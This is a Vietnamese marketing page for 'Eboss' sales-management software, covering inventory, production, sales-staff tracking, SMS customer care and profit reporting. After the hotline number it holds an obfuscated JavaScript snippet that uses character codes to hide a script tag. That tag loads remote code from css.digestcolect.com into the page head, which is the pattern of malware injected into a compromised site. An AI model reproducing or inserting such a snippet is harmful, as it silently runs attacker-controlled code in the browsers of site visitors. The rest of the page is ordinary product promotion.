Chúng tôi có sự khác biệt với các sản phẩm khác trên thị trường

Hệ thống quản lý sản phẩm chẵn lẻ rõ ràng

Quản lý toàn diện doanh nghiệp chặt chẽ

Dễ dàng quản lý bán hàng giúp quản lý từng khâu nguyên liệu đến khâu sản xuất thành phẩm, sau đó đến bán hàng, kế toán, nhân sự, khách hàng.

Hệ thống quản lý sản phẩm chẵn lẻ rõ ràng

Bảo mật dữ liệu toàn vẹn!

Chúng tôi quan niệm rằng thông tin khách hàng là quan trọng. Vì vậy toàn bộ dữ liệu được lưu dưới máy của khách hàng.

Hệ thống quản lý sản phẩm chẵn lẻ rõ ràng

Xuất báo cáo chính xác

Lợi nhuận được tính dựa trên chi phí biến thể và chi phí cố định. Chi phí cố định được phân bổ hợp lý theo định mức. Để ra báo cáo lợi nhuận chính xác!

Hệ thống quản lý sản phẩm chẵn lẻ rõ ràng

Hệ thống quản lý sản phẩm chẵn lẻ rõ ràng

Chẳng hạn sản phẩm quý khách nhập vào là thùng khi bán ra lẻ hoặc bán thúng Eboss đều giải quyết được chẵn lẻ rõ ràng.

Định vị lộ trình nhân viên kinh doanh trên app mobile

Định vị lộ trình nhân viên kinh doanh trên app mobile

Hệ thống hỗ trợ chạy trên ios và android.Phần mềm quản lý bán hàng thích hợp cho doanh nghiệp cần quản lý nhân viên kinh doanh. Nhân viên có thể tạo đơn hàng trên app và người quản lý biết được đơn hàng phát sinh từ nhân viên đó. Qua đó biết được nhân viên đó đang ở đâu.

QUÝ KHÁCH NÊN XEM VIDEO TRƯỚC KHI MUA

Báo giá phần mềm quản lý bán hàng

Hotline: 0918.907.186(Mr Chánh)

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Icon function fast

Phần mềm bán hàng với chức năng quản lý kho linh hoạt!

Ngoài việc hỗ trợ bán hàng cho các doanh nghiệp thương mại mua đi bán lại. Eboss là phần mềm quản lý bán hàng quản lý được sản phẩm cho những doanh nghiệp nhập nguyên liệu sản xuất thành phẩm. Chúng tôi quản lý từ khâu mua nguyên liệu đầu vào cho đến khâu sản xuất thành phẩm. Bởi có rất nhiều doanh nghiệp hoạt động theo mô hình nhập nguyên liệu bán thành phẩm. Đó là sự khác biệt mà Eboss mang đến cho khách hàng trải nghiệm tốt nhất về bán hàng.

Bộ phận pha chế
Bán hàng trên điện thoại

Phần mềm bán hàng trên điện thoại di động

  1. Eboss ngoài chạy trên máy tính bàn, laptop. Còn chạy trên app IOS và Android. Nhân viên kinh doanh có thể tạo đơn hàng từ xa. Hệ thống quản lý lộ trình của từng nhân viên kinh doanh và doanh số của từng người. Người quản lý biết được nhân viên đó đang ở đâu đi những nơi nào.
  2. Là người quản lý chắc chắn quý khách bận tâm việc nhân viên kinh doanh có chú trọng vào công việc của công ty hay không. Hay họ có thể một lúc làm cho nhiều công ty. Trong khi bạn phải trả lượng hàng ngày cho họ. Eboss giúp quý khách giải quyết được vấn đề này.
  3. Ngoài ra họ có đến khách hàng không khi ra ngoài thị trường. Eboss giúp nhân viên đó xác nhận công việc mình khi đến bất kỳ khách hàng nào của công ty bạn. Sau mỗi lần tiếp cận khách hàng Eboss bắt buộc nhân viên đó phải chụp hình tại đó và upload lên hệ thống cho người quản lý tiện theo dõi.

Quản lý sản phẩm chẵn lẻ linh hoạt

-Khi khảo sát một số doanh nghiệp sử dụng phần mềm quản lý bán hàng. Chúng tôi nhận thấy rằng việc nhập sao bán vậy là vấn đề đơn giản. Nhưng đa số các doanh nghiệp họ thường nhập thùng và bán lẻ hộp trong thùng hoặc bán cả thùng. Hệ thống bán hàng EBoss giải quyết được vấn đề trên. Chúng tôi phân ra chẵn lẻ rõ ràng khi xuất đơn hàng.

-Eboss biết rằng trong kho còn bao nhiêu thùng và lẻ bao nhiêu hộp hoặc gói trong thùng.

Nhập kho

Đây là sản phẩm chúng tôi nhập vào là thùng bán ra là hộp lẻ.

nhap kho
Bán hàng

Ví dụ thùng 24 hộp. Chúng tôi nhập bán 25 hộp. Đồng thời nếu khuyến mãi nhập khuyến mãi. Giao diện sẽ như sau:

Sau đó đơn hàng sẽ được hệ thống phân chẵn lẻ như sau:

don-hang
don-hang
Tính năng nổi bật eboss
Icon function flexible

Quản lý sản xuất thành phẩm

Hệ thống cho phép quý khách tạo phiếu sản xuất của từng thành phẩm từ các nguyên liệu. Khi tạo thành phẩm nguyên liệu trong kho sẽ tự động trừ đi trong kho nguyên liệu. Sau đó thành phẩm sẽ được nhập vào kho thành phẩm riêng. Có thể xuất thành phẩm đi các chi nhánh để bán. Đảm bảo rằng các doanh nghiệp hoạt động theo mô hình sản xuất thành phẩm sử dụng tốt nhất sản phẩm của chúng tôi. Chọn Eboss là sự lựa chọn hợp lý nhất cho doanh nghiệp của bạn..

icon function trade

Quản lý bán hàng với đầy chức năng tiện ích

Quản lý đơn hàng tình trạng đơn hàng: đang xử lý, đã hoàn thành. Tỉnh trạng thanh toán : đã thanh toán và nợ. Quy trình bán hàng chặt chẽ. Quản lý trả hàng trên từng đơn hàng nếu xác định được mã đơn hàng. Ngoài ra quý khách có thể trả hàng khi không xác định được đơn hàng mà chỉ xác định được khách hàng.

Tính năng Sapo nổi bật
quản lý khách hàng
icon function full

Quản lý khách hàng

-Tự động gửi SMS cho khách hàng khi phát sinh đơn hàng để báo ngày giờ giao hàng. Làm cho khách hàng có cảm giác yên tâm hơn khi đặt hàng xong.

– Đặt lịch gửi SMS để chăm sóc khách hàng

-Quản lý tích điểm khách hàng, tạo nhóm giá cho từng khách hàng. Bởi mỗi khách hàng bán giá khác nhau. Chính vì thế hệ thống cho phép quý khách tạo riêng giá cho từng khách hàng. Hệ thống có thể gửi báo giá qua mail cho khách hàng. Ngoài ra quý khách có thể tạo khuyến mãi theo thời gian tùy chỉnh.

icon function exactly

Hệ thống báo cáo chính xác nhất

Thưa quý khách! Hiện nay đang tồn tại nhiều phần mềm bán hàng. Tuy nhiên phần mềm bán hàng tích hợp được với kế toán ở mức cơ bản như tính lợi nhuận dựa vào chi phí được phân bổ mới thực sự chính xác. EBoss giúp quý khách tính lợi nhuận dựa vào hai loại chi phí: chi phí tài sản cố định và chi phí phát sinh theo ngày. Phần mềm cho phép quý khách nhập số tiền chi phí tài sản cố định. Sau đó nhập số tháng phân bổ. Hệ thống tự phân bổ chi phí ra từng tháng. Nhằm đưa ra báo cáo lợi nhuận chính xác nhất có thể.

– Báo cáo tài sản cố định số tiền đã phân bổ, số tiền còn tồn chưa phân bổ

– Báo cáo công nợ nhà cung cấp, công nợ khách hàng

– Báo cáo tổng số tiền thu được từ COD, tiền mặt, chuyển khoản

– Báo cáo doanh số theo nhân viên kinh doanh

– Báo cáo doanh số theo khách hàng

– Báo cáo doanh số theo từng cửa hàng

– Báo cáo lợi nhuận

– Báo cáo thu, chi

– Sổ quỹ từng cửa hàng, tất cả cửa hàng: tổng thu, tổng chi, lợi nhuận.

Hệ thống báo cáo chính xác nhất
ứng dụng công nghệ hiện đại
icon function modern

EBoss ứng dụng công nghệ hiện đại

EBoss ứng dụng công nghệ điện toán đám mây. Giúp ông chủ có thể quản lý từ xa khi đi công tác. Nắm bắt được tình tình kinh doanh của cả công ty. Theo dõi mọi hoạt động kinh doanh diễn ra hàng ngày. Có thể dùng ipad, điện thoại truy cập.